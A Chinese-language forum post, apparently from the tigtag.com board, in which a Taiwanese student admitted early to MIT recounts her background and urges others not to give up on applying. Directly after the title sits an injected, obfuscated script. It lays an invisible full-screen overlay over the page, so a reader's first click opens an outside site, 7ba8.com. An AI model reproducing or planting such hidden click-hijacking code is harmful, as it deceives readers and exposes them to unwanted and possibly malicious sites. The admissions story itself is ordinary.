申请经验:你也可以进美国麻省理工学院

<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>我是一个高中从台湾来美国念书的学生,平常比较多在滴答论坛的美国生活版活动( bbs.tigtag.com )星期一收到MIT EA入取通知 ,成了class 2013的一员。因此在论坛发了一篇感谢朋友们陪伴我的文章,而后被never19问了这个问题:
我可以请问一下你觉得你为什么会进吗?
例如:SAT高or..奥林匹亚冠军之类的??
MIT is my dream school too!
---
我发现不管是在台湾的学生或在中国的学生都有进MIT一定要Olympiad金牌的观念,有时候更因为自己没有达到这个标准而放弃自己MIT的梦想。
我觉得自己是一个很平凡的人,单纯的喜爱科学,然后一心一意的想进MIT。因此我把给never19的回复贴到美国留学版来,希望大家不要退却进MIT的梦,相信自己,勇敢的追求。
------
哈啰never19,
我把你的留言看了又看,总觉得你跟我以前好像,疯狂想进MIT的样子。所以我打算打一篇文章,看看可不可以提供你一些帮助。
我记得我去年也像你一样一直在问人这些问题,觉得自己不够好不够强,却一心一意想进MIT。
我的ACT跟SAT成绩普普,托福有到标准以上,然后修了IB的课程。跟其他申请的人比起来,我觉得并没有什么突出的地方,因为大家的成绩都是那个水平的程度。
可是,我觉得自己很喜欢科学,而且,很想进MIT。
我高一时来美国,一开始吃了很多苦,因为全年级只有我一个东方人,互动模式上有时候会受到欺负。为了让英文变的好一点,我参加足球队,增加自己跟人说英文的机会,暑假去大学修英文课,哲学课,然后到医院做志工顺练自己口说能力。
以前国中的时候,我最想加入的就是物理社,可 是学校唯一的数理相关社团只有数学社,因此我便在十年级下学期开始在数学社活动。当时的数学社刚成立,数学社唯一的活动就是募款,毫无学术相关的课程。因 此十年级后那个暑假我就邀一个朋友一起设计数学社的活动,课程,及募款的行程。暑假结束后被选上了社长,然后就带学生参加学校史上第一个国际36小时的数学竞赛,国内AMC,AMIE竞赛,设立数学家教的单位,然后经由募款设立了一个给数学杰出学生的奖学金。
当时,我最喜欢浏览的网站就是MIT的Admission Blog。其中有一篇文章是关于MIT建议学生参加的Summer Program。我当时申请了MIT Minority Enrichment Program,Stanford Mathematics Program,跟Summer Science Program。其中,SSP,为期时间最长,成立时间有五十年之久,还有许多物理相关的课程,所以我就选择把我的暑假花在那个Program上。SSP对我来说是一种震撼,三十五个学生里面,大家几乎都是全校第一名,很多人都到实验室做研究,有些人是全国西洋棋手,有人拿了在十年级就拿IMO铜牌+IChO金牌+世界文学竞赛金牌,有些人是LHS(全世界最大的粒子加速器)的研究员…..等。老实说我一直是很没有信心的人,也从来都不觉得自己很强或聪明,可是跟那些学生相处一个多月之后,突然发现大家其实都是平凡的,唯一的共同点就是,很爱科学,很爱思考,很努力。SSP的课程很重,教授每天做的就是把大学及研究所程度的数学物理天文宇宙学以最快速度填塞进我们的脑子里。我们每天晚上都围在宿舍二楼宿舍的会议厅狂解题,一边谈到自己的理想及我们梦想的大学。还没去SSP之前,我总觉得自己可能只能去州立学校,因为几乎是全校同学去的地方,我从来都没有妄想过更好的学校。而在会议厅的大方桌上,大家讨论的都是Harvard, MIT, CalTech, Stanford, Princeton, Yale等等的学校。我记得自己当时很坦明的跟我那群朋友说我总觉得自己一定进不去那些学校。我还记得他们跟我摆摆手,说我真爱说笑,我一定是进那些学校的学生。当时我觉得他们对我的激励真大,觉得如果他们可以做得到并且要去实践,为什么我不可以呢?除了这个激励之外,SSP逼着我挑战自己的极限,在最后一周以整周共三小时的睡眠,写完一个预测行星轨道的程序软件,然后每个礼拜牺牲好几晚的睡眠观测刚刚被发现的supernova (我跟其他三个队友是全世界前几个观测到SN2008a的人xD)。而我把这些经验全告诉MIT跟我的interviewer(我一个SSP在Florida的朋友的MIT interviewer还刚好是SSP以前的学员xD)
Junior时我修了一堂IB Chemistry,全班只有六个人,我一个女生。因为人数实在太少了,所以我们就跟Honor class三 十几个学生倂班,然后我们在后半部分的教室自学化学。那间化学教室里面还有一个老师专用的超小房间,我们就常常围着圆桌写化学以外的作业xD,讨论科学议 题之类的。我跟一个朋友就打算利用温室气体原理来改进太阳能热水器。我们写了无数封信给当地的大学教授寻找帮助,我打了几十通电话给美国各地提供温室气体 的工厂找寻材料,然后每天花六小时以上的时间泡在我同学家的车库制作改良的热能板。完工后的热能板不能算完美,可是却增进了普通热能板百分之二十以上的效 能。
十二年级,我也想同其他SSP同学一样去实验室工作,因此我就email一百多个在ASU的教授,询问工作机会。后来我就去ASU的BioDesign Institute工作,我做的是疫苗混合的实验。当时我跟我的指导员聊到他们的工作时数,发现一些很简单不需要那些拥有博士学位的学员进行的测试需要他们三小时以上的时间执行,所以我就把自己实验室production line有效利用人力资源,替代高学位人员的的理念计划也写进MIT的申请数据里。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Copyright © 2020-2021 tigtag.com |网站地图  
快速回复 返回列表 返回顶部